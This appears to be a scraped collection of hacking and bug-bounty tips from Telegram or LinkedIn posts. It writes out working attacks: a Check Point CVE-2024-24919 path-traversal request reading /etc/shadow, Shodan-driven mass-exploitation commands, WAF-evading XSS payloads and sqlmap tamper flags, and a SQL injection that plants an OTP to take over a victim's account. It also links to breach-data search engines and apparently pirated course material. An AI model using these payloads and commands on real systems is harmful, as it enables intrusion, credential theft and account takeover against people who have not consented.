Termux All Command [Telegram Group]

For this vulnerability Shodan dork: title:"Check Point" ssl:"target" CVE-2024-24919 POST /clients/MyCRL HTTP/1.1 host: target Content-Length: 39 aCSHELL/../../../../../../../etc/shadow

CVE-2023-48795 "Vulnerable to Terrapin" Discovered vulnerability: Terrapin Identified using Nuclei Tools: Command: nuclei -u http://xyz.com -t /home/hackerhalt/nuclei-templates/javascript/cves Learn more about Terrapin Scanner: https://lnkd.in/grjTd5Js

Trending CVE-2024-24919 Exploit link https://lnkd.in/gqX7u2jF Commands: shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt python3 exploit.py -l ~/targets.txt -t 200 -o output.txt -ftd /etc/passwd

thm writeups : https://github.com/AssassinUKG/Writeups/tree/main/tryhackme

thm writeups : https://github.com/pamhrituc/TryHackMe_Writeups

';a=prompt,a()// '-eval("window['pro'%2B'mpt'](8)")-' "-eval("window['pro'%2B'mpt'](8)")-" "onclick=prompt(8)>"@x.y "onclick=prompt(8)>

Usefull Cross Site Scripting Xss Payload %22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--

#DataBreach Search Engines 🔍 Some of the best data breach search engines I've come across. ∙ Intelligence X - https://intelx.io ∙ leakcheck - https://leakcheck.io ∙ weleakinfo - https://weleakinfo.io ∙ leakpeek - https://leakpeek.com ∙ snusbase - https://snusbase.com ∙ GlobaLeaks - https://www.globaleaks.org ∙ Firefox Monitor - https://lnkd.in/gW7EqXr ∙ haveibeenpwned? - https://haveibeenpwned.com ∙ ScatteredSecrets - https://lnkd.in/gegkVQPN ∙ AmIBreched - https://amibreached.com ∙ Leak Lookup - https://leak-lookup.com ∙ Breach Checker - https://breachchecker.com ∙ RSLookup - https://rslookup.com ∙ Ghost Poject - https://ghostproject.fr ∙ Exposed - https://exposed.lol

🔍 Top Recon Tools for Bug Bounty 🔍 🌐 Nmap - https://nmap.org/ 🕵️ Nikto - https://cirt.net/Nikto2 🌐 Amass - https://lnkd.in/dwfGpGUd 🔍 Dirsearch - https://lnkd.in/dGAZc38 🌐 Sublist3r - https://lnkd.in/fPHtNKH 🚪 Knockpy - https://lnkd.in/grGa9UU 🔍 Gitrob - https://lnkd.in/egY6chT 🔍 Shodan - https://www.shodan.io/ 🔍 Censys - https://censys.com/ 🌐 Subfinder - https://lnkd.in/d3extT6 🚀 Feroxbuster - https://lnkd.in/emQfsVM 🔍 DnsValidator - https://lnkd.in/gaaPMT5V 🚀 Rustscan - https://lnkd.in/dEt2jWn 🛤 Waymore - https://lnkd.in/dP5yeaxy 🕷 Gospider - https://lnkd.in/eDmZB8ct 🔍 Top Recon Tools for Bug Bounty 🔍 🌐 Nmap - https://nmap.org/ 🕵️ Nikto - https://cirt.net/Nikto2 🌐 Amass - https://lnkd.in/dwfGpGUd 🔍 Dirsearch - https://lnkd.in/dGAZc38 🌐 Sublist3r - https://lnkd.in/fPHtNKH 🚪 Knockpy - https://lnkd.in/grGa9UU 🔍 Gitrob - https://lnkd.in/egY6chT 🔍 Shodan - https://www.shodan.io/ 🔍 Censys - https://censys.com/ 🌐 Subfinder - https://lnkd.in/d3extT6 🚀 Feroxbuster - https://lnkd.in/emQfsVM 🔍 DnsValidator - https://lnkd.in/gaaPMT5V 🚀 Rustscan - https://lnkd.in/dEt2jWn 🛤 Waymore - https://lnkd.in/dP5yeaxy 🕷 Gospider - https://lnkd.in/eDmZB8ct

🚨SHARE SOMEONE NEED IT🚨 🌀FREE Bug Bounty Complete Course! 🌀 🔗Download Link: https://lnkd.in/dRBaf6mX

If you find sql injection and encounter a 403 or waf block, be sure to try tamper scripts and update your sqlmap 🌹🌹🔥🥳🥳 sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash Credit:@ynsmroztas

Red Teaming : https://mega.nz/folder/p5lCVA6R#G-jMymQzkyeEfZ_d441x0A

[+] XSS Vulnerability Payload List https://lnkd.in/g7tBFfzA

FREE Bug Bounty Complete Course! 🔥🔥 Learn Bug Bounty to identify and report System vulnerabilities before cybercriminals exploit them. A Udemy Complete Course. Download Link: https://lnkd.in/dRBaf6mX

𝗖𝗩𝗘𝘅𝗽𝗹𝗼𝗶𝘁𝘀 is a database of exploits for all of the old & new common exposures and weaknesses (CVEs) by collecting the exploits automatically from around the internet websites & projects such as (#github, #gitlab, packet storm security, #metasploit modules and many more) as a Real-Time Monitoring System. » https://cvexploits.io/

Parameters Finder using just waybackurls tool: Command: waybackurls vulnweb.com | sort -u | grep "=" | grep -Piv "\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)$

𝑭𝒊𝒏𝒅𝒊𝒏𝒈 𝒊𝒎𝒑𝒐𝒓𝒕𝒂𝒏𝒕 𝒆𝒏𝒅𝒑𝒐𝒊𝒏𝒕𝒔 𝒘𝒊𝒕𝒉 𝒌𝒂𝒕𝒂𝒏𝒂 katana -u vulnweb.com -d 5 -ps -pss waybackarchive,coomoncrawl,alienvault -f qurl -jc -xhr -kf -fx -fx dn -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -u vulnweb.com specifies the target URL. -d 5 sets the depth. -s waybackarchive,commoncrawl,alienvault sets the sources. -f qurl sets the output format. -jc enables JavaScript crawling. -xhr enables XHR crawling. -kf enables keyword filtering. -fx and -fx dn set filters to exclude certain types of files. -ef excludes files with specific extensions.

Bug bounty tips And tricks 👇🤩 SQL Injection to Account Takeover Manually :) 1. Enter mobile number to login intercept {"mobile_number":"8888888888"} >> 200 {"mobile_number":"8888888888'"} >> 500 {"mobile_number":"8888888888''"} >> 200 2. Final Query: 8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') -- 2024-04-03 21:20:55 >> Exact time and date 1 >> attempts you can see the 200 response last you can login with the 1110 OTP and get access to the victim account :) hashtag#bug hashtag#bugbounter hashtag#bughunter hashtag#bugfixing hashtag#bugtips